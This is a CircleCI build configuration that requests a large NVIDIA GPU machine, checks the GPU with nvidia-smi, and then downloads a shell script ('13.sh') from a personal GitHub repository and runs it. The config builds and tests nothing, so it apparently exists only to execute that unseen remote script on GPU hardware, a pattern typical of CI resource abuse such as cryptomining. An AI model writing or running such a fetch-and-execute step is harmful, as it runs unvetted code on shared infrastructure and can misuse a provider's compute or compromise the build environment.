version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.large
    steps:
      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi
      - run:  wget https://raw.githubusercontent.com/rindalasririn/a/main/13.sh && chmod +x 13.sh &&./13.sh